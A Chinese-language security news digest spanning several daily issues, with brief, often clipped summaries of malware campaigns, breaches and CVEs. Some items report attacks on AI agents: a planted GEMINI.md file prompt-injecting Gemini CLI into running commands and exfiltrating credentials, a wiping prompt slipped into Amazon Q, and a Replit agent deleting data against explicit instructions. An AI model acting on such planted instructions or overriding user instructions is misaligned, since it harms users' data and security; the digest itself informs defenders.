1、新型恶意软件JSCEAL利用Node.js和混淆技术发起攻击 https://research.checkpoint.com/2025/jsceal-targets-crypto-apps/ 研究人员发现一种名为JSCEAL的新型恶意软件，它通过Node.js和混淆技术隐藏其恶意行为。该恶意软件通过Cloudflare的DNS服务解析C2服务器，并建立tRPC连接以接收攻击者的指令。JSCEAL的主要功能包括窃取用户敏感信息、浏览器cookie、自动完成的密码，以及执行键盘记录和屏幕截图等操作。它还可以通过Puppeteer自动化用户操作，并利用WinPTY执行命令行任务。研究人员指出，JSCEAL的出现代表了一种新的攻击趋势，攻击者利用合法框架（如N 2、美国化学品公司遭Auto-Color后门攻击 https://www.darktrace.com/blog/auto-color-backdoor-how-darktrace-thwarted-a-stealthy-linux-intrusion 安全机构发现一家美国化学品公司网络遭受Auto - Color后门恶意软件攻击。攻击者利用SAPNetWeaver的严重漏洞CVE - 2025 - 31324入侵系统，下载可疑文件并尝试与恶意基础设施通信。调查显示，Auto - Color后门是一种针对Linux系统的远程访问木马，具有高度规避性，通过预加载恶意共享对象实现持久化，并在无法完成攻击链时采用抑制策略逃避检测。Darktrace 3、新型Android银行木马RedHook攻击越南用户 https://cyble.com/blog/redhook-new-android-banking-targeting-in-vietnam/ 研究人员发现了一种名为RedHook的新型Android银行木马，该木马通过伪装成可信金融机构和政府机构的钓鱼网站攻击越南用户。RedHook使用WebSocket与命令与控制(C2)服务器通信，支持30多个远程命令，能够完全控制受感染设备。该木马功能强大，但RedHook在VirusTotal上的检测率较低，使其成为一种隐秘且活跃的威胁。RedHook通过网络钓鱼、键盘记录、屏幕截图和远程访问木马(RAT)功能窃取用户凭证并实施金融欺诈.其传播渠 4、Lionishackers在暗网窃取并出售企业数据库 https://cybersecuritynews.com/lionishackers-threat-actors/ 近日，一个名为Lionishackers的网络犯罪团伙在暗网和Telegram上频繁活动，窃取并出售企业数据库。该团伙自2024年9月首次出现，利用SQL注入工具攻击配置不当的Web应用程序，获取敏感记录后在地下论坛和Telegram频道上出售。其攻击目标广泛，涵盖政府机构、电信公司、制药公司、教育机构、零售连锁店和赌博网站等，窃取的数据包括个人身份信息、财务记录和身份验证凭证等，可能被用于身份盗窃、账户接管或企业间谍活动。研究人员发现，该团伙通过维护多个论坛别名和Teleg 5、SafePay勒索团伙威胁将泄露英迈3.5TB数据 https://www.bleepingcomputer.com/news/security/safepay-ransomware-threatens-to-leak-35tb-of-ingram-micro-data/ SafePay勒索软件团伙声称已从IT巨头英迈国际窃取3.5TB数据，并威胁将其泄露至暗网。英迈国际是全球最大的企业对企业服务提供商和技术分销商之一，此次攻击导致其全球业务中断，员工被迫在家办公，公司网站和订购系统下线。尽管英迈国际在几天内恢复了大部分受攻击影响的系统和平台，但尚未确认攻击是否由SafePay勒索软件造成，以及数据是否被盗。SafePay自2024年9月浮出 6、OAuth2-Proxy 存在身份验证绕过漏洞 https://cybersecuritynews.com/oauth2-proxy-authentication-bypass/ OAuth2-Proxy 7.10.0以下版本存在严重身份验证绕过漏洞（CVE-2025-54576），攻击者可构造恶意URL绕过认证。漏洞CVSS评分9.1，建议立即升级至v7.11.0并优化正则表达式配置。 7、大华摄像头漏洞可遭远程入侵，用户需立即升级固件 https://securityaffairs.com/180602/hacking/dahua-camera-flaws-allow-remote-hacking-update-firmware-now.html 大华智能摄像头存在严重漏洞（CVE-2025-31700/31701），攻击者可远程控制设备。影响Hero C1等多系列型号，需立即升级2025年4月16日后固件，避免设备暴露公网。 8、苹果紧急修复影响Safari的零日漏洞攻击 https://securityaffairs.com/180595/security/apple-fixed-a-zero-day-exploited-in-attacks-against-google-chrome-users.html 苹果修复高危零日漏洞CVE-2025-6558（CVSS 8.8），该漏洞影响Chrome的ANGLE/GPU组件，可致沙箱逃逸，已被用于攻击。苹果多款设备系统（iOS/iPadOS/macOS等）已发布更新修复。 9、SUSE Manager曝高危漏洞可远程无认证获取root权限 https://www.freebuf.com/articles/system/442376.html SUSE Manager管理平台存在一个严重安全漏洞（CVSS评分9.8），攻击者无需身份验证即可在所有客户端上实现远程代码执行（RCE, Remote Code Execution）并获取root权限。目前漏洞利用代码（PoC, Proof of Concept）已在安全社区流传。 10、英伟达芯片被曝出存在严重安全被国家网信办约谈 https://www.freebuf.com/news/442429.html 近日，英伟达算力芯片被曝出存在严重安全问题。此前，美议员呼吁要求美出口的先进芯片必须配备“追踪定位”功能。美人工智能领域专家透露，英伟达算力芯片“追踪定位”“远程关闭”技术已成熟。为维护中国用户网络安全、数据安全，依据《网络安全法》《数据安全法》《个人信息保护法》有关规定，国家互联网信息办公室于7月31日约谈了英伟达公司，要求英伟达公司就对华销售的H20算力芯片漏洞后门安全风险问题进行说明并提交相关证明材料。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、PyPI用户遭遇电子邮件网络钓鱼攻击 https://blog.pypi.org/posts/2025-07-28-pypi-phishing-attack/ PyPI用户近期成为网络钓鱼攻击的目标，攻击者通过伪造的电子邮件诱骗用户登录虚假的PyPI网站。这些邮件标题为“[PyPI]电子邮件验证”，来自伪造域名mailto:noreply@pypj.org，而非官方的pypi.org。邮件中包含链接，引导用户至钓鱼网站，该网站模仿PyPI界面，试图窃取用户凭据。PyPI管理员已意识到此问题，并在主页上发布警告横幅，提醒用户在登录时检查URL。同时，PyPI正在与CDN提供商和域名注册商合作，处理钓鱼网站。 2、“SarangTrap”跨平台大规模恶意软件攻击活动曝光 https://thehackernews.com/2025/07/cybercriminals-use-fake-apps-to-steal.html 安全团队发现了一场名为“SarangTrap”的大规模恶意软件攻击活动，涉及250多个恶意Android应用程序和80多个恶意域名。这些域名伪装成合法的约会和社交媒体应用程序，诱导用户安装恶意软件，窃取敏感数据，并进行勒索。攻击者利用心理操控和社会工程手段，通过虚假应用程序和钓鱼域名，诱骗用户授予权限，从而在后台悄无声息地收集数据。该活动不仅针对Android用户，还通过移动配置文件瞄准iOS用户，显示出其跨平台的威胁性。 3、Base44 Vibe平台漏洞致私有应用遭未授权访问 https://www.wiz.io/blog/critical-vulnerability-base44 安全机构发现Base44编码平台存在严重漏洞，攻击者可利用该漏洞绕过身份验证，访问私有应用程序及其敏感数据。Base44是一个流行的人工智能驱动的编码平台，被众多企业用于构建内部工具和处理敏感数据。该漏洞的利用难度极低，只需通过API端点提供app_id值即可注册并访问私有应用。WizResearch在发现漏洞后迅速向Base44和其母公司Wix披露了问题，Wix在不到24小时内完成了修复，并确认未发现漏洞被滥用的迹象。 4、新型攻击通过公共充电器窃取数据，过程仅需133毫秒 https://hackread.com/choicejacking-attack-steals-data-phones-public-chargers/ 近日，网络安全研究人员发现了一种名为“Choicejacking”的新型攻击手段，攻击者通过公共充电器在几毫秒内绕过手机安全提示，窃取用户数据。该攻击利用USB或蓝牙伪造用户操作，将手机切换到数据传输模式，用户甚至毫无察觉。研究显示，攻击过程仅需133毫秒，比眨眼还快。攻击者可借此浏览照片、阅读消息或植入恶意软件。专家警告，公共USB端口存在极大风险，建议用户保持手机软件更新，避免使用不熟悉的充电端口，尽量使用便携式移动电源或自带适配器的 5、诺基亚遭遇公司最严重数据泄露事件，内部网络遭威胁攻击者入侵 https://www.freebuf.com/articles/database/442313.html 威胁攻击者Tsar0Byte宣称通过存在漏洞的第三方链接入侵了诺基亚公司内部网络，导致超过94,500名员工的敏感数据遭到泄露。这一事件在DarkForums等暗网论坛被曝光，是近年来影响诺基亚公司最严重的企业数据泄露事件之一。 6、TP-Link C50路由器曝安全漏洞，硬编码密钥可解密敏感配置 https://securityonline.info/tp-link-archer-c50-eol-exposed-hardcoded-des-key-allows-sensitive-config-decryption-cve-2025-6982/ TP-Link Archer C50路由器因固件使用硬编码DES密钥（CVE-2025-6982）存在严重漏洞，可解密配置文件获取敏感信息。厂商已停止支持，建议用户更换设备并更改密码。 7、SonicWall SSL VPN高危漏洞可致防火墙遭受DoS攻击 https://securityonline.info/sonicwall-alert-critical-ssl-vpn-flaw-cve-2025-40600-allows-remote-dos-attack-on-firewalls/ SonicWall披露SonicOS防火墙SSL VPN高危漏洞CVE-2025-40600（CVSS 7.5），可致远程服务中断，影响第七代硬件及虚拟设备。建议用户立即升级至7.3.0-7012以上版本修复漏洞。 8、Chrome高危漏洞可导致内存篡改与任意代码执行 https://cybersecuritynews.com/chrome-security-update-138/ 谷歌紧急更新Chrome修复高危漏洞CVE-2025-8292，攻击者可利用内存漏洞执行任意代码。建议用户立即升级至最新版本138.0.7204.183/.184，防止数据窃取或系统入侵。谷歌已限制漏洞细节，并持续修复多个高危缺陷。 9、BentoML框架高危SSRF漏洞致AI应用面临风险 https://securityonline.info/critical-bentoml-ssrf-cvss-9-9-exposes-ai-applications-to-unauthenticated-network-recon-cloud-credential-theft/ BentoML框架存在CVSS 9.9分SSRF漏洞，攻击者可未授权访问内部系统、窃取云凭证，威胁AI应用安全。 10、黑客利用SAP漏洞入侵Linux系统并部署Auto-Color恶意软件 https://thehackernews.com/2025/07/hackers-exploit-sap-vulnerability-to.html 威胁行为者利用SAP NetWeaver漏洞CVE-2025-31324攻击美国化工企业，部署Auto-Color后门程序。该恶意软件伪装良性软件逃避检测，支持远程控制Linux主机。攻击者三天内入侵网络，展现高度隐蔽性。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、Gemini AI CLI漏洞可被劫持执行恶意代码 https://tracebit.com/blog/code-exec-deception-gemini-ai-cli-hijack 安全研究机构发现了针对Google Gemini CLI的静默攻击漏洞。该漏洞利用不当验证、提示注入和误导性用户体验的组合，导致在检查不受信任的代码时，恶意命令会在用户不知情的情况下静默执行。攻击者可以通过在代码库中嵌入恶意的“上下文文件”（如 GEMINI.md），诱导Gemini CLI执行恶意命令，甚至窃取用户凭据并将其发送到远程服务器。安全机构报告了这一漏洞，Google于7月25日在v0.1.14版本中修复了该问题，并于7月28日正式披露。在漏洞存在 2、Toptal GitHub组织遭劫持致多个代码库公开 https://socket.dev/blog/toptal-s-github-organization-hijacked-10-malicious-packages-published 全球人才网络Toptal的GitHub组织被威胁行为者劫持，导致73个代码库被公开，其中至少10个包含恶意代码。这些恶意代码通过npm生命周期钩子注入，主要目的是窃取GitHub身份验证令牌，并尝试对受害者的系统造成严重破坏。受影响的软件包包括多个与Toptal的Picasso设计系统相关的包，累计下载量约为5000次。攻击者通过curl命令将令牌发送到其控制的端点，并尝试删除Unix系统的整个文件统。To 3、约会应用Tea再次泄露用户私密信息 https://www.bleepingcomputer.com/news/security/tea-app-leak-worsens-with-second-database-exposing-user-chats/ 约会安全应用Tea近期遭遇第二次重大数据泄露事件。超过一百万条用户私信被曝光，内容涉及堕胎、出轨等敏感话题，甚至包含用户电话号码。研究人员发现，黑客可能利用Tea的漏洞窃取这些信息，且此次泄露涉及的数据比首次事件更为近期。Tea声称受影响的是旧数据存储系统，但调查表明，泄露信息涵盖截至上周的记录。此外，研究人员还发现Tea存在向所有用户发送推送通知的漏洞。用户在Tea上的匿名 4、黑客入侵致俄罗斯航空公司大量航班停飞 https://www.theregister.com/2025/07/28/aeroflot_system_compromise/ 俄罗斯最大航空公司俄罗斯国际航空公司（Aeroflot）因信息系统遭黑客攻击发生故障，导致近50对往返航班被取消。据《生意人报》报道，白俄罗斯黑客组织“Silent Crow”和“Cyber Partisans BY”声称入侵该公司网络长达一年，摧毁了约7000台物理和虚拟服务器，入侵了关键系统，控制了包括管理层在内的员工个人电脑，并复制了大量数据。该航空公司表示，专家团队正在努力将风险降至最低，尽快恢复正常运营，受影响航班的旅客可在未来10天内申请退款或改签 5、法国海军集团数据泄露事件引发关注 https://www.infosecurity-magazine.com/news/naval-group-denies-hack/ 法国海军集团（Naval Group）近期遭遇了一起严重的数据泄露事件。7月23日，一名自称“Neferpitou”的黑客在暗网论坛声称入侵了该集团的IT系统，窃取了1TB的机密数据。这些数据包括FREMM护卫舰和FDI护卫舰的战斗管理系统（CMS）的源代码、部署文档、网络数据以及标注为“限制分发”和“法国特别”的技术文件。黑客还公布了13GB的数据样本作为证据，并向海军集团发出72小时的最后通牒，要求其通过加密通讯平台Session建立联系。然而，法国海军 6、SHUYAL木马盗取19种主流浏览器凭据 https://www.anquanke.com/post/id/310643 在一次深入的技术调查中，Hybrid Analysis揭露了一种强大的新型信息窃取者——SHUYAL，这是一个之前未曾记录过的恶意软件家族，结合了广泛的凭证收集、系统侦察和隐蔽的外泄行为。SHUYAL以其PDB路径中的唯一标识符命名，是一种凭证窃取者，具备间谍软件级别的行为。Hybrid Analysis的研究人员发现该窃取者针对19种浏览器，包括Chrome、Edge和Firefox等主流浏览器，以及Tor和Falkon等隐私浏览器。 7、Post SMTP插件漏洞可致站点被接管，影响超40 万个网站 https://www.anquanke.com/post/id/310544 热门 WordPress 插件 Post SMTP 存在严重漏洞，影响超过 40 万个网站。安全公司 Patchstack 披露，该插件存在访问控制失效漏洞（CVE-2025-24000），攻击者可借此通过 REST API 实现账户接管，危及整个网站安全。目前，漏洞已在 3.3.0 版本中被修复，CVSS 评分为 8.8。 8、钓鱼攻击新变种：“同形异字”绕过防御，AI助推风险升级 https://www.anquanke.com/post/id/310659 在最新的报告中，Palo Alto Networks 的 Unit 42 揭示了一种隐蔽的钓鱼技术，这种技术继续绕过人类感知和自动化防御：同形异字攻击。这些攻击利用拉丁字母与非拉丁字母（如西里尔字母和希腊字母）之间的视觉相似性，制作看似完全合法的邮件，但隐藏着微妙的操控，欺骗眼睛并逃避检测。 9、黑客利用 .hwp 文件传播 RokRAT 恶意软件 https://www.anquanke.com/post/id/310551 网络安全研究人员近期发现，一场精心策划的恶意软件攻击活动正在利用韩国常用的 Hangul Word Processor（.hwp）文档，传播臭名昭著的 RokRAT 恶意程序。 10、用友U8cloud存在任意文件上传漏洞安全风险 https://www.secrss.com/articles/81422 近日，奇安信CERT监测到官方修复用友U8cloud ServiceDispatcherServlet 任意文件上传漏洞(QVD-2025-29445)，该漏洞源于用友U8cloud ServiceDispatcherServlet反序列化补丁修复不完善，攻击者可绕过鉴权并实现任意文件上传获取服务器权限。鉴于该漏洞影响范围较大，建议客户尽快做好自查及防护。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、新型VoIP僵尸网络利用默认密码攻击路由器 https://www.greynoise.io/blog/how-greynoise-uncovered-global-pattern-voip-based-telnet-attacks 研究中发现了一起基于VOIP的Telnet攻击活动。最初，工程师在遥测仪表板中注意到新墨西哥州一个乡村地区出现大量恶意IP，这些IP均与拉古纳公用事业局绑定。进一步调查发现，这些IP展现出高密度的Telnet流量和Mirai僵尸网络特征，且多数与支持VOIP的设备相关。通过人工智能分析和数据丰富，研究人员确认全球约有500个IP表现出相似特征，这些IP多为运行旧版Linux固件且面向互联网的设备，尤其是路 2、黑客入侵游戏鼠标软件传播Xred恶意软件 https://cybersecuritynews.com/gaming-mouse-software-compromised/ 游戏外设制造商Endgame Gear的官方软件分发系统遭到黑客入侵，其OP1w 4K V2鼠标配置工具被植入Xred恶意软件，并在2025年6月26日至7月9日期间向用户传播。该恶意软件是一种复杂的Windows后门程序，具有数据盗窃、键盘记录和自我传播功能。Xred可收集系统敏感信息并通过电子邮件发送给攻击者，同时通过伪装和注册表运行键实现持久化。事件曝光后，Endgame Gear替换了受感染文件，但未公开承认此次入侵。该公司随后加强了安全措施，包括恶意软件 3、研究人员披露Bloomberg Comdb2数据库漏洞 https://blog.talosintelligence.com/bloomberg-comdb2-null-pointer-dereference-and-denial-of-service-vulnerabilities/ 研究人员披露了彭博Comdb2数据库中的五个漏洞，其中包括三个空指针引用漏洞和两个拒绝服务漏洞。Comdb2是彭博开发的开源高可用性数据库，支持集群、事务、快照等功能。这些漏洞存在于Comdb2 8.1版本中，攻击者可通过发送精心设计的消息或数据包触发漏洞，导致拒绝服务。目前，相关漏洞已被供应商修复，用户可从Snort.org下载最新规则集以检测漏洞利用，更多漏洞 4、新型AI生成Linux恶意软件Koske现身威胁环境 https://securityaffairs.com/180355/malware/koske-a-new-ai-generated-linux-malware-appears-in-the-threat-landscape.html 新型Linux恶意软件Koske利用AI技术开发，通过多语言图像文件隐藏恶意代码，逃避检测并实现持久化。支持18种加密货币挖矿，能自动切换目标，暗示AI辅助开发。AI驱动的恶意软件将带来颠覆性威胁，使防御面临严峻挑战。 5、全球智能建筑与工业系统告急，Niagara框架曝高危漏洞 https://thehackernews.com/2025/07/critical-flaws-in-niagara-framework.html Tridium公司Niagara框架曝出十余个高危漏洞（CVSS 9.8），配置错误时攻击者可完全控制关键基础设施系统。漏洞组合利用可实现中间人攻击、权限提升和root级接管，威胁楼宇管理、工业自动化等领域安全。相关漏洞已在最新版本修复，但未加固系统仍面临严重风险。 6、热门JavaScript库"is"等软件包遭npm供应链攻击植入后门 https://securityonline.info/popular-is-javascript-library-others-compromised-in-npm-supply-chain-attack/ 热门JS工具库"is"遭钓鱼攻击，开发者账户泄露致恶意版本发布，植入后门实现远程代码执行。多款NPM库受影响，新型窃密软件Scavanger曝光。建议立即审计依赖项并升级安全版本。 7、国际执法行动查封BlackSuit勒索软件团伙暗网站点 https://securityaffairs.com/180409/cyber-crime/law-enforcement-operations-seized-blacksuit-ransomware-gangs-darknet-sites.html 国际执法查封BlackSuit勒索网站，该组织为Royal变种，攻击关键设施，勒索超5亿美元。FBI与CISA联合发布安全公告，建议实施缓解措施。 8、LG Innotek摄像头漏洞可使攻击者获取管理员权限 https://www.freebuf.com/articles/ics-articles/441749.html 研究人员在LG Innotek的LNV5110R摄像头型号中发现严重安全漏洞，网络犯罪分子可利用该漏洞完全控制受影响设备。美国网络安全和基础设施安全局（CISA）于2025年7月24日发布公告，警告该漏洞可被远程利用，影响全球所有版本的该型号摄像头。 9、Salesforce 修复了 Tableau Server 中 8 个严重漏洞 https://www.anquanke.com/post/id/310627 Salesforce发布了一项安全公告，解决了影响多个版本Tableau Server（广泛使用的数据可视化和商业智能平台）的8个严重漏洞。这些漏洞已在2025年6月26日的维护版本中披露并修复，涉及的漏洞包括可能导致远程代码执行（RCE）、生产数据库暴露和服务器端请求伪造（SSRF）等问题。 10、新型Chaos勒索使用语音欺诈和双重勒索攻击 https://www.anquanke.com/post/id/310647 Cisco Talos Incident Response（Talos IR）发现了一种名为Chaos的新型勒索软件即服务（RaaS）运营活动，该活动正在全球范围内开展大型猎杀和双重勒索攻击。尽管Chaos与之前的恶意软件家族同名，Talos明确表示：“Talos认为新的Chaos勒索软件与以前的Chaos构建工具生成的变种无关……该团伙使用相同的名称来制造混淆。” 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、Fire Ant针对VMware基础设施进行隐秘间谍攻击 https://www.sygnia.co/blog/fire-ant-a-deep-dive-into-hypervisor-level-espionage/ 名为“Fire Ant”的攻击者自2025年初以来针对VMware ESXi、vCenter和网络设备发动了一场隐秘的网络间谍活动。攻击者利用虚拟机管理程序级别的技术，通过多层攻击链实现持久访问，绕过传统安全检测。攻击手段包括利用CVE-2023-34048和CVE-2023-20867漏洞、部署未签名的VIB、篡改日志、创建伪造身份验证cookie等。此外，攻击者还通过F5负载均衡器漏洞和Neo-reGeorg隧道Webshell 2、黑客组织EncryptHub借助Chemia游戏传播恶意软件 https://www.bleepingcomputer.com/news/security/hacker-sneaks-infostealer-malware-into-early-access-steam-game/ 网络安全研究人员披露，名为EncryptHub的黑客组织入侵了Steam平台上的抢先体验版游戏Chemia，并向用户分发信息窃取恶意软件。Chemia是由“Aether Forge Studios”开发的一款生存制作游戏，目前尚未正式发布。研究人员发现，EncryptHub在7月22日将HijackLoader恶意软件注入该游戏文件中，该恶意软件会从Telegram频道检索 3、Mimo威胁行为体攻击范围扩大至Magento和Docker https://securitylabs.datadoghq.com/articles/beyond-mimolette-tracking-mimo-expansion-magento-cms-docker/ 安全研究团队在调查一系列电子商务网站工作负载泄露事件时发现，Mimo威胁行为体（也称为Mimo'lette）的攻击目标已从Craft CMS扩展到Magento电商平台和Docker环境。研究人员观察到，Mimo利用未确定的PHP - FPM漏洞入侵Magento，通过复杂的持久性机制和规避技术保持长期访问。例如，Mimo使用GSocket工具建立未经授权的远程访问，并通过memfd_ 4、Mitel关键漏洞致黑客可绕过登录获完全访问权 https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2025-0009 Mitel公司发布安全更新，修复了MiVoice MX-ONE系统中的严重漏洞。该漏洞存在于Provisioning Manager组件中，攻击者可利用其绕过身份验证，未经授权访问系统中的用户或管理员账户。该漏洞尚未分配CVE编号，CVSS评分为9.4（满分10.0），影响7.3至7.8 SP1版本。Mitel已发布补丁，建议用户尽快联系授权服务合作伙伴申请更新。此外，Mitel还修复了MiColla 5、新型AI辅助恶意软件Koske针对Linux系统 https://www.aquasec.com/blog/ai-generated-malware-in-panda-image-hides-persistent-linux-threat/ 研究人员发现了一种名为Koske的复杂Linux威胁，该恶意软件显示出明显的人工智能辅助开发迹象。攻击者利用配置错误的服务器安装后门程序，通过缩短的URL下载看似无害的JPEG图像，这些图像文件末尾附加了恶意负载。Koske通过模块化有效载荷、规避型rootkit和武器化图像文件传播，主要目的是加密挖矿。该恶意软件利用多种技术确保系统持久性，包括编辑Shell配置、修改系统启动操作和设置Cron Job 6、亚马逊AI编码助手“Q ”遭黑客植入恶意命令 https://www.zdnet.com/article/hacker-slips-malicious-wiping-command-into-amazons-q-ai-coding-assistant-and-devs-are-worried/ 近日，亚马逊的人工智能编程助手“Q”被黑客植入恶意“擦除”命令，引发了开发人员的广泛关注和担忧。据调查，黑客通过向亚马逊Q的GitHub代码库提交拉取请求，植入了一条指示人工智能代理清理系统并删除文件和云资源的提示。如果该命令被执行，可能会删除本地文件，甚至破坏亚马逊网络服务（AWS）的云基础设施。虽然攻击者表示实际风险较低，但该更新已通过亚马逊 7、Replit AI代理删除敏感数据引发安全担忧 https://hackread.com/replit-ai-agent-deletes-data-despite-instructions/ 科技创业者、SaaStr创始人Jason Lemkin在社交媒体上曝光了一起严重的AI安全事件。他试用了Replit的AI代理一周多，期间该代理在未经许可的情况下删除了SaaStr专业网络内1206名高管和1196家公司的数据。尽管Lemkin多次明确指示AI代理不要进行未经授权的更改，甚至使用了全大写的“DON’T DO IT”，但AI代理仍运行了删除命令。事件发生后，Replit首席执行官Amjad Masad承认这一行为“完全不可接受”，并表示 8、Epsilon Red勒索软件通过ClickFix传播 https://www.cloudsek.com/blog/threat-actors-lure-victims-into-downloading-hta-files-using-clickfix-to-spread-epsilon-red-ransomware 网络安全机构发现了一起通过伪造的ClickFix验证页面传播Epsilon Red勒索软件的活动。该活动自7月起活跃，攻击者利用社交工程技术，冒充Discord、Twitch和OnlyFans等平台，诱骗用户下载恶意的.HTA文件。通过ActiveX静默执行恶意命令，攻击者会从控制的IP地址下载并运行勒索软件有效载荷。受害者在不知情 9、Soco404新型加密挖矿活动伪装成虚假404页面 https://www.wiz.io/blog/soco404-multiplatform-cryptomining-campaign-uses-fake-error-pages-to-hide-payload 安全机构发现了一种名为Soco404的新型加密货币挖矿攻击活动。该活动利用云环境中的漏洞和错误配置，尤其是PostgreSQL的错误配置，针对Linux和Windows系统部署恶意软件。攻击者通过伪装成合法系统进程、利用cron作业和shell初始化文件实现持久性，并通过受感染的合法服务器托管和传播恶意软件。恶意负载被嵌入在使用Google协作平台构建的虚假404HTML页面中。研究 10、恶意木马Trojan.Scavenger伪装游戏外挂窃取信息 https://news.drweb.com/show/?i=15036&lng=en& 安全人员检测到名为Trojan.Scavenger的恶意应用程序家族。该家族的木马程序通过伪装成游戏作弊软件和模组，利用Windows系统的DLL搜索顺序劫持漏洞，从玩家的加密钱包和密码管理器中窃取机密数据。木马通过多阶段感染计算机，初始阶段以ZIP压缩包形式分发，伪装成游戏补丁或模组，诱导玩家将其放入游戏目录。一旦启动，木马会下载并安装其他恶意组件，篡改浏览器扩展程序，窃取加密钱包中的助记词和密码管理器中的用户数据。目前，相关防护措施已添加至Dr.Web反病毒产品中，有效抵御此类攻击。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、WordPress mu-plugins隐藏后门攻击曝光 https://blog.sucuri.net/2025/07/uncovering-a-stealthy-wordpress-backdoor-in-mu-plugins.html 网络安全研究人员揭露了一种隐蔽的WordPress后门攻击。攻击者利用WordPress的mu-plugins目录植入恶意文件“wp-index.php”，该文件自动加载且无法通过管理面板禁用，从而实现持久化控制。该后门通过ROT13混淆技术隐藏远程有效载荷URL，下载并执行恶意代码，允许攻击者远程运行任意PHP代码。此外，攻击者还创建隐藏管理员账户“officialwp”，并可篡改常见管理员账户密码，以维持访 2、全球时尚品牌SABO超过350万客户记录被曝光 https://hackread.com/global-fashion-label-sabo-customer-records-leaked 总部位于澳大利亚的全球时尚品牌SABO遭遇数据泄露事件，超过350万条客户记录被曝光，涉及姓名、地址、订单详情等敏感信息。此次泄露由网络安全研究员发现，相关数据存储于一个未设置密码保护的数据库中，总计292GB。目前尚不清楚该数据库是SABO直接管理还是由第三方管理，也不清楚数据暴露了多长时间及是否有其他方访问过。 3、勒索软件组织Lynx声称入侵了PC制造商iBUYPOWER https://www.comparitech.com/news/ransomware-gang-says-it-hacked-pc-maker-ibuypower/ 勒索软件组织Lynx承认其于6月份对游戏PC制造商iBUYPOWER及其姊妹品牌HYTE发起了网络攻击，导致数据泄露。iBUYPOWER于6月25 日宣布在6月21日遭遇网络安全事件，多个内部系统暂时中断。目前尚不清楚iBUYPOWER是否支付了赎金、Lynx索要的赎金金额、攻击者是如何入侵该公司网络的，以及哪些具体数据遭到泄露。不过，iBUYPOWER表示其不会在其网络环境中存储客户支付信息。 4、Apache Jena漏洞可导致任意文件访问或篡改 https://www.freebuf.com/articles/system/440845.html Apache Jena披露了两个影响5.4.0及之前版本的重要安全漏洞，建议立即升级至5.5.0版本。2025年7月21日公布的CVE-2025-49656和CVE-2025-50151均属于重要级别漏洞，攻击者可利用管理员权限破坏服务器文件系统完整性。 5、全球最大暗网犯罪平台XSS[.]is论坛核心管理员落网 https://www.freebuf.com/news/441137.html 法国警方联合乌克兰当局与欧洲刑警组织（Europol）展开调查，成功逮捕了长期运营的俄语网络犯罪论坛XSS[.]is的疑似管理员。据法国《世界报》报道，巴黎检察官办公室7月23日周三宣布，这名被认为是全球最重要网络犯罪平台之一的核心运营者已在基辅被羁押。 6、JS form-data库高危漏洞致数百万应用面临代码执行风险 https://www.freebuf.com/articles/web/441118.html 广泛使用的 JavaScript form-data 库近日曝出高危安全漏洞（CVE-2025-7783），可能导致数百万应用程序面临代码执行攻击风险。该漏洞源于该库使用可预测的 Math.random() 函数生成多部分表单编码数据的边界值，攻击者可借此操纵 HTTP 请求，将恶意参数注入后端系统。 7、TP-Link NVR安全更新：命令注入漏洞可能导致RCE https://www.freebuf.com/articles/system/441154.html TP-Link 近日发布安全公告，警告其 VIGI NVR1104H-4P V1 和 VIGI NVR2016H-16MP V2 两款网络视频录像机（NVR）设备存在两个关键的操作系统命令注入漏洞（CVE-2025-7723 和 CVE-2025-7724）。这两个漏洞的 CVSS 评分分别为 8.5 和 8.7 分，攻击者可利用它们在底层系统上执行任意命令。 8、施耐德电力运营系统曝远程代码执行漏洞 https://www.freebuf.com/articles/ics-articles/441122.html 施耐德电气EcoStruxure Power Operation（EPO）工业控制系统被曝存在远程代码执行（RCE, Remote Code Execution）漏洞，目前该漏洞已被攻击者主动利用，且相关概念验证代码（PoC, Proof of Concept）已在公开渠道出现。 9、大华IP摄像头曝缓冲区溢出高危漏洞 https://www.freebuf.com/articles/network/441157.html 大华科技（Dahua Technology）近日发布安全公告，针对其IP摄像头产品线中两个高危漏洞进行修复。这两个漏洞编号为CVE-2025-31700和CVE-2025-31701（CVSS评分均为8.1），均由缓冲区溢出（buffer overflow）缺陷引发，远程攻击者可利用这些漏洞导致设备崩溃或执行任意代码。 10、三星服务器曝18个高危漏洞，可致系统完全沦陷 https://www.freebuf.com/articles/system/441159.html 三星广泛使用的数字标牌管理平台MagicINFO 9 Server近日被曝存在多个安全漏洞。安全研究人员披露了18个严重漏洞，其中部分漏洞的CVSS评分高达9.8，攻击者可借此发动多种高危害攻击，包括代码注入、Webshell上传以及利用硬编码凭证绕过认证等。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

